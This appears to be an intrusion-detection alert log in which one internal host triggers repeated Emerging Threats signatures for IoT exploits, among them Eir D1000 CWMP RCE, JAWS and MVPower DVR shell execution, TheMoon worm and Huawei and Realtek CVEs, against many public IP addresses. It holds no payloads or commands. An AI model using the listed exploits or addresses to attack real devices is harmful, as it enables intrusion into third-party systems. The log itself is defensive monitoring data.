ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.61.6.49

Timestamp:	03/18/24-09:59:22.177204
SID:	2023548
Source Port:	60574
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 202.164.238.99

Timestamp:	03/18/24-09:59:48.724619
SID:	2030092
Source Port:	53968
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.227.196.191

Timestamp:	03/18/24-09:59:26.025353
SID:	2023548
Source Port:	55216
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 63.32.154.23

Timestamp:	03/18/24-09:59:58.122716
SID:	2025883
Source Port:	54496
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 170.249.13.75

Timestamp:	03/18/24-09:57:03.137101
SID:	2023548
Source Port:	34850
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 88.210.67.128

Timestamp:	03/18/24-09:59:26.641189
SID:	2025576
Source Port:	41414
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.178.198.25

Timestamp:	03/18/24-09:57:00.832395
SID:	2023548
Source Port:	41252
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 45.223.187.192

Timestamp:	03/18/24-10:00:10.011690
SID:	2025883
Source Port:	59148
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 89.161.153.7

Timestamp:	03/18/24-09:58:57.122705
SID:	2025883
Source Port:	42828
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 35.244.193.5

Timestamp:	03/18/24-09:59:48.292748
SID:	2023548
Source Port:	55672
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.153.219.74

Timestamp:	03/18/24-09:58:58.038353
SID:	2018132
Source Port:	46812
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.216.137.146

Timestamp:	03/18/24-09:56:59.969405
SID:	2025883
Source Port:	37150
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.66.73.239

Timestamp:	03/18/24-09:59:31.336202
SID:	2030092
Source Port:	34326
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.114.153.197

Timestamp:	03/18/24-09:58:48.002994
SID:	2023548
Source Port:	38872
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 84.72.32.178

Timestamp:	03/18/24-09:58:28.076725
SID:	2023548
Source Port:	59360
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 66.171.6.151

Timestamp:	03/18/24-10:00:15.346945
SID:	2023548
Source Port:	58616
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.159.3.230

Timestamp:	03/18/24-09:59:38.058177
SID:	2025883
Source Port:	32962
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 85.10.196.214

Timestamp:	03/18/24-09:59:41.936655
SID:	2030092
Source Port:	51914
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 31.207.172.189

Timestamp:	03/18/24-10:00:00.920976
SID:	2023548
Source Port:	58638
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.58.175.251

Timestamp:	03/18/24-09:58:18.554317
SID:	2023548
Source Port:	49954
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 134.122.204.130

Timestamp:	03/18/24-09:59:41.251449
SID:	2025576
Source Port:	43824
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.247.255.214

Timestamp:	03/18/24-09:57:00.610841
SID:	2023548
Source Port:	52086
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 149.29.86.232

Timestamp:	03/18/24-10:00:10.408529
SID:	2030092
Source Port:	60264
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 62.99.89.49

Timestamp:	03/18/24-09:58:19.098718
SID:	2030092
Source Port:	45564
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 108.128.117.78

Timestamp:	03/18/24-10:00:18.971266
SID:	2030092
Source Port:	38746
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.251.168.124

Timestamp:	03/18/24-09:58:47.614213
SID:	2030092
Source Port:	56372
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.189.232.192

Timestamp:	03/18/24-10:00:21.087703
SID:	2023548
Source Port:	42550
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.181.68.10

Timestamp:	03/18/24-09:59:16.496444
SID:	2023548
Source Port:	48656
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 150.95.159.115

Timestamp:	03/18/24-09:57:05.893615
SID:	2030092
Source Port:	54494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.251.168.124

Timestamp:	03/18/24-09:58:49.680476
SID:	2030092
Source Port:	56420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.120.20.207

Timestamp:	03/18/24-09:58:18.906920
SID:	2023548
Source Port:	56468
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 213.109.47.1

Timestamp:	03/18/24-09:59:05.636000
SID:	2025883
Source Port:	56008
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.162.167

Timestamp:	03/18/24-09:57:07.734441
SID:	2018132
Source Port:	36016
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.35.135.158

Timestamp:	03/18/24-09:59:35.625304
SID:	2023548
Source Port:	47422
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.123.66.142

Timestamp:	03/18/24-09:59:01.783847
SID:	2023548
Source Port:	59272
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 173.194.166.70

Timestamp:	03/18/24-09:59:48.894367
SID:	2025883
Source Port:	42902
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 189.41.19.125

Timestamp:	03/18/24-09:59:24.625518
SID:	2023548
Source Port:	33986
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 189.69.252.115

Timestamp:	03/18/24-09:59:39.814916
SID:	2023548
Source Port:	33846
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 45.59.160.240

Timestamp:	03/18/24-09:58:30.794788
SID:	2030092
Source Port:	50648
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 113.42.117.235

Timestamp:	03/18/24-09:59:33.664929
SID:	2023548
Source Port:	59242
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 159.203.27.226

Timestamp:	03/18/24-09:59:49.016247
SID:	2030092
Source Port:	44566
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.45.100

Timestamp:	03/18/24-10:00:23.046208
SID:	2018132
Source Port:	37618
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 162.247.236.14

Timestamp:	03/18/24-09:59:06.620467
SID:	2025883
Source Port:	50504
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 184.167.249.7

Timestamp:	03/18/24-09:59:56.965080
SID:	2025883
Source Port:	45710
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 184.94.139.193

Timestamp:	03/18/24-09:57:05.452348
SID:	2018132
Source Port:	44242
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.190.64.140

Timestamp:	03/18/24-09:59:23.542366
SID:	2023548
Source Port:	46792
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 153.188.212.192

Timestamp:	03/18/24-10:00:25.817938
SID:	2030092
Source Port:	33118
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 20.76.125.11

Timestamp:	03/18/24-10:00:14.969137
SID:	2025883
Source Port:	53858
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.64.202.226

Timestamp:	03/18/24-09:58:41.716309
SID:	2025883
Source Port:	39072
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 31.131.210.28

Timestamp:	03/18/24-10:00:23.114584
SID:	2023548
Source Port:	53270
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 31.131.210.28

Timestamp:	03/18/24-10:00:23.336769
SID:	2023548
Source Port:	53290
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.84.21.38

Timestamp:	03/18/24-10:00:06.076397
SID:	2023548
Source Port:	33664
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.247.143

Timestamp:	03/18/24-09:58:58.126233
SID:	2018132
Source Port:	42110
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 76.12.139.97

Timestamp:	03/18/24-09:56:59.979274
SID:	2030092
Source Port:	53174
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.123.220.202

Timestamp:	03/18/24-09:58:54.740957
SID:	2018132
Source Port:	49666
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.35.141.21

Timestamp:	03/18/24-09:59:13.037261
SID:	2023548
Source Port:	46724
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 67.231.250.92

Timestamp:	03/18/24-09:58:41.158159
SID:	2025883
Source Port:	47806
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.102.150.31

Timestamp:	03/18/24-10:00:03.354287
SID:	2023548
Source Port:	58672
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.93.233.151

Timestamp:	03/18/24-09:59:15.529134
SID:	2030092
Source Port:	55986
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 51.75.219.79

Timestamp:	03/18/24-09:59:58.046074
SID:	2025883
Source Port:	58012
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.8.22

Timestamp:	03/18/24-09:59:49.122727
SID:	2018132
Source Port:	60468
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 105.98.181.140

Timestamp:	03/18/24-09:58:13.509468
SID:	2023548
Source Port:	44196
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.221.141

Timestamp:	03/18/24-10:00:03.434288
SID:	2018132
Source Port:	37086
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 47.90.56.66

Timestamp:	03/18/24-09:58:52.013648
SID:	2030092
Source Port:	48362
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.144.50.78

Timestamp:	03/18/24-09:57:00.797405
SID:	2023548
Source Port:	49390
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.121.40.184

Timestamp:	03/18/24-09:59:33.123596
SID:	2023548
Source Port:	49316
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 185.169.252.74

Timestamp:	03/18/24-09:59:12.624348
SID:	2025576
Source Port:	48790
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.12.21.149

Timestamp:	03/18/24-09:58:39.271663
SID:	2025576
Source Port:	39050
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 130.255.218.62

Timestamp:	03/18/24-10:00:03.353066
SID:	2023548
Source Port:	49748
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.35.39.33

Timestamp:	03/18/24-09:58:43.102416
SID:	2023548
Source Port:	42510
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.40.210.21

Timestamp:	03/18/24-09:58:21.157179
SID:	2030092
Source Port:	50420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 51.15.203.55

Timestamp:	03/18/24-09:56:59.945610
SID:	2030092
Source Port:	38734
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.167.158

Timestamp:	03/18/24-10:00:25.270711
SID:	2018132
Source Port:	39874
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.122.126.218

Timestamp:	03/18/24-09:58:35.903121
SID:	2023548
Source Port:	37778
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 174.112.182.64

Timestamp:	03/18/24-09:59:25.979633
SID:	2023548
Source Port:	40438
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.162.236.139

Timestamp:	03/18/24-09:59:17.417819
SID:	2023548
Source Port:	55718
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.44.187

Timestamp:	03/18/24-10:00:03.845175
SID:	2027339
Source Port:	50922
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.97.180.200

Timestamp:	03/18/24-09:58:34.684953
SID:	2023548
Source Port:	46602
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.184.68.60

Timestamp:	03/18/24-09:59:17.713838
SID:	2023548
Source Port:	54884
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.27.79

Timestamp:	03/18/24-10:00:03.845211
SID:	2027339
Source Port:	56148
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 43.141.130.162

Timestamp:	03/18/24-09:58:20.642028
SID:	2025883
Source Port:	36170
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.40.210.21

Timestamp:	03/18/24-09:58:19.974462
SID:	2025883
Source Port:	50216
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.61.180.26

Timestamp:	03/18/24-09:59:50.638164
SID:	2023548
Source Port:	46498
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.123.65.181

Timestamp:	03/18/24-09:58:17.864509
SID:	2023548
Source Port:	32984
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.186.214.0

Timestamp:	03/18/24-09:58:33.405623
SID:	2030092
Source Port:	51646
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 68.105.122.47

Timestamp:	03/18/24-09:59:56.884340
SID:	2023548
Source Port:	41240
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 188.54.48.148

Timestamp:	03/18/24-09:59:14.143487
SID:	2023548
Source Port:	48018
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.14.155.142

Timestamp:	03/18/24-09:59:48.336109
SID:	2025576
Source Port:	41850
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.76.244.211

Timestamp:	03/18/24-09:57:07.783456
SID:	2023548
Source Port:	56140
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.77.135.134

Timestamp:	03/18/24-09:58:48.532590
SID:	2829579
Source Port:	48196
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.24.19.129

Timestamp:	03/18/24-09:58:41.275025
SID:	2023548
Source Port:	49906
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.209.67.252

Timestamp:	03/18/24-09:58:50.159371
SID:	2023548
Source Port:	37760
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.96.14.164

Timestamp:	03/18/24-09:58:48.074184
SID:	2023548
Source Port:	40784
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.76.62.210

Timestamp:	03/18/24-09:58:43.243625
SID:	2025883
Source Port:	42560
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.99.43.131

Timestamp:	03/18/24-09:58:50.297377
SID:	2023548
Source Port:	39906
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.133.48.241

Timestamp:	03/18/24-09:57:00.692827
SID:	2023548
Source Port:	54046
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.113.78.91

Timestamp:	03/18/24-09:59:15.850970
SID:	2023548
Source Port:	53496
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.141.115

Timestamp:	03/18/24-09:59:39.445151
SID:	2018132
Source Port:	37854
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 38.28.174.40

Timestamp:	03/18/24-09:56:57.279538
SID:	2025883
Source Port:	52090
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 91.228.7.126

Timestamp:	03/18/24-10:00:16.427958
SID:	2030092
Source Port:	35986
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 77.55.170.67

Timestamp:	03/18/24-09:58:20.498156
SID:	2025883
Source Port:	45974
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.255.78.196

Timestamp:	03/18/24-10:00:21.978699
SID:	2023548
Source Port:	35582
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.58.175.251

Timestamp:	03/18/24-09:58:18.270757
SID:	2023548
Source Port:	49898
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 13.110.114.118

Timestamp:	03/18/24-09:58:50.837080
SID:	2025883
Source Port:	35958
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 197.255.152.175

Timestamp:	03/18/24-09:58:38.057042
SID:	2025883
Source Port:	55570
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 98.144.106.249

Timestamp:	03/18/24-09:58:17.819993
SID:	2023548
Source Port:	36536
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 108.156.177.126

Timestamp:	03/18/24-09:59:17.828652
SID:	2025576
Source Port:	45554
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 79.142.113.113

Timestamp:	03/18/24-09:58:37.291671
SID:	2030092
Source Port:	56528
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.176.217.112

Timestamp:	03/18/24-10:00:18.969836
SID:	2030092
Source Port:	55318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 150.220.58.104

Timestamp:	03/18/24-09:59:17.419144
SID:	2023548
Source Port:	39366
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 201.184.234.250

Timestamp:	03/18/24-10:00:23.143348
SID:	2025576
Source Port:	46722
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

